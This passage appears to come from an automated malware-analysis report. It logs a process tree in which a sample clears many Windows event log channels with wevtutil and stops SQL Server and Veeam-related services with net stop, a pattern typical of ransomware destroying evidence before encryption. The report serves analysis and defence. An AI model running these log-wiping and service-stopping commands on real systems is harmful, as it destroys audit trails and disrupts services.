      wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
      4⤵
      PID:4588
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
      4⤵
      PID:4796
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
      4⤵
      PID:4636
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
      4⤵
      PID:6460
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
      4⤵
      PID:4464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
      4⤵
      PID:4376
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:4316
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
      4⤵
      PID:4296
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
      4⤵
      PID:4276
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
      4⤵
      PID:4328
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
      4⤵
      Clears Windows event logs
      PID:4424
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
      4⤵
      Clears Windows event logs
      PID:6332
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
      4⤵
      PID:4520
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
      4⤵
      PID:6292
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
      4⤵
      PID:6268
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
      4⤵
      PID:5528
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
      4⤵
      PID:5672
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
      4⤵
      Clears Windows event logs
      PID:5484
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
      4⤵
      PID:2084
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
      4⤵
      PID:5416
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
      4⤵
      PID:5380
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
      4⤵
      PID:5320
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
      4⤵
      PID:5924
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
      4⤵
      Clears Windows event logs
      PID:5224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
      4⤵
      PID:5240
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
      4⤵
      PID:5196
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
      4⤵
      PID:4152
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
      4⤵
      PID:4480
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
      4⤵
      PID:3788
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
      4⤵
      PID:5888
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
      4⤵
      Clears Windows event logs
      PID:5420
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
      4⤵
      PID:2436
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
      4⤵
      PID:6128
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
      4⤵
      PID:5696
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
      4⤵
      Clears Windows event logs
      PID:5716
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
      4⤵
      Clears Windows event logs
      PID:2148
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
      4⤵
      PID:4736
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
      4⤵
      Clears Windows event logs
      PID:3920
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
      4⤵
      PID:5996
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
      4⤵
      Clears Windows event logs
      PID:5048
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
      4⤵
      PID:5044
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
      4⤵
      Clears Windows event logs
      PID:5356
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
      4⤵
      Clears Windows event logs
      PID:5352
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
      4⤵
      PID:4980
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
      4⤵
      PID:4784
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
      4⤵
      PID:4600
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
      4⤵
      PID:4476
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
      4⤵
      PID:4404
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
      4⤵
      PID:4332
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
      4⤵
      PID:4260
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
      4⤵
      PID:2976
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
      4⤵
      PID:5784
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
      4⤵
      PID:4856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
      4⤵
      PID:5492
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
      4⤵
      PID:6388
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
      4⤵
      PID:6948
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
      4⤵
      PID:6496
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
      4⤵
      Clears Windows event logs
      PID:6724
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
      4⤵
      PID:6628
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
      4⤵
      PID:6436
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
      4⤵
      PID:6580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
      4⤵
      PID:6800
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
      4⤵
      PID:7044
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
      4⤵
      Clears Windows event logs
      PID:1076
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
      4⤵
      PID:2956
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
      4⤵
      Clears Windows event logs
      PID:7024
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
      4⤵
      PID:2816
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
      4⤵
      PID:2892
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
      4⤵
      PID:2016
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
      4⤵
      Clears Windows event logs
      PID:3568
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
      4⤵
      PID:1756
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
      4⤵
      Clears Windows event logs
      PID:376
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
      4⤵
      PID:3364
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
      4⤵
      PID:1740
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
      4⤵
      PID:3372
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
      4⤵
      PID:2128
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
      4⤵
      PID:3400
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
      4⤵
      PID:1724
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
      4⤵
      PID:1564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
      4⤵
      PID:2832
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
      4⤵
      PID:5392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
      4⤵
      PID:2100
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
      4⤵
      PID:6076
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
      4⤵
      PID:6232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
      4⤵
      PID:4108
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
      4⤵
      PID:4192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
      4⤵
      PID:6228
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
      4⤵
      Clears Windows event logs
      PID:5896
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
      4⤵
      Clears Windows event logs
      PID:5952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
      4⤵
      PID:5852
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
      4⤵
      PID:5828
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
      4⤵
      PID:5768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
      4⤵
      PID:5652
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
      4⤵
      PID:5640
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
      4⤵
      PID:5100
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
      4⤵
      PID:2304
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
      4⤵
      PID:5572
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
      4⤵
      PID:4768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
      4⤵
      PID:4848
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
      4⤵
      Clears Windows event logs
      PID:4832
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
      4⤵
      PID:4644
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
      4⤵
      Clears Windows event logs
      PID:4604
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
      4⤵
      PID:4668
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
      4⤵
      PID:4792
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
      4⤵
      PID:4596
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
      4⤵
      PID:4564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
      4⤵
      PID:4636
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
      4⤵
      PID:4676
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
      4⤵
      PID:4648
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
      4⤵
      PID:6460
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
      4⤵
      PID:4472
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
      4⤵
      PID:4468
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
      4⤵
      PID:4464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
      4⤵
      PID:4380
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:4412
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
      4⤵
      PID:4376
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
      4⤵
      PID:4316
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
      4⤵
      PID:4296
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
      4⤵
      PID:4308
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
      4⤵
      PID:4324
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
      4⤵
      PID:4276
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
      4⤵
      PID:4328
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
      4⤵
      PID:4424
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
      4⤵
      PID:6372
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
      4⤵
      PID:4360
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
      4⤵
      PID:6332
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
      4⤵
      PID:4520
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
      4⤵
      PID:6320
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Help/Operational"
      4⤵
      PID:6348
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:6268
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
      4⤵
      PID:6248
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
      4⤵
      PID:5528
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
      4⤵
      PID:4532
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
      4⤵
      PID:5396
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
      4⤵
      PID:4456
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
      4⤵
      PID:5200
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
      4⤵
      PID:5420
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
      4⤵
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
      4⤵
      PID:1632
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
      4⤵
      PID:5232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
      4⤵
      PID:3820
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
      4⤵
      PID:5964
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-International/Operational"
      4⤵
      PID:5344
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
      4⤵
      PID:4884
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
      4⤵
      PID:4600
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
      4⤵
      PID:5444
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
      4⤵
      PID:6240
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
      4⤵
      PID:6652
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
      4⤵
      PID:6940
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
      4⤵
      PID:2540
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
      4⤵
      PID:5188
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
      4⤵
      PID:2168
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
      4⤵
      PID:1140
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
      4⤵
      PID:6600
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
      4⤵
      PID:6920
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
      4⤵
      PID:6444
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:6512
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
      4⤵
      Clears Windows event logs
      PID:6520
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
      4⤵
      PID:6580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
      4⤵
      PID:6584
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
      4⤵
      Clears Windows event logs
      PID:6540
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
      4⤵
      PID:6872
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
      4⤵
      PID:5300
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
      4⤵
      PID:6856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
      4⤵
      PID:7164
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
      4⤵
      PID:6612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
      4⤵
      PID:6824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
      4⤵
      PID:3420
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
      4⤵
      PID:6816
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
      4⤵
      PID:7104
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
      4⤵
      PID:2992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:1652
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
      4⤵
      PID:6756
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
      4⤵
      PID:6760
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
      4⤵
      PID:7116
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
      4⤵
      PID:2180
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
      4⤵
      PID:3628
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
      4⤵
      PID:3736
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
      4⤵
      PID:3620
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
      4⤵
      PID:3496
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
      4⤵
      PID:1700
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
      4⤵
      PID:2868
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
      4⤵
      PID:2888
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
      4⤵
      PID:1744
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
      4⤵
      PID:1572
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
      4⤵
      PID:484
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
      4⤵
      PID:3000
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
      4⤵
      PID:3444
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
      4⤵
      PID:2884
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
      4⤵
      PID:2132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
      4⤵
      PID:3008
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
      4⤵
      PID:2492
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
      4⤵
      PID:2172
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
      4⤵
      PID:3564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
      4⤵
      PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:2008
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2012"
      4⤵
      PID:4060
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
        5⤵
        
        PID:3744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLBrowser"
    3⤵
    PID:4080
  - - C:\Windows\system32\net.exe
      net stop "SQLBrowser"
      4⤵
      PID:2904
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLBrowser"
        5⤵
        
        PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"
    3⤵
    PID:1116
  - - C:\Windows\system32\net.exe
      net stop "SQLSafeOLRService"
      4⤵
      PID:2412
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSafeOLRService"
        5⤵
        
        PID:3208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"
    3⤵
    PID:2212
  - - C:\Windows\system32\net.exe
      net stop "SQLSERVERAGENT"
      4⤵
      PID:2688
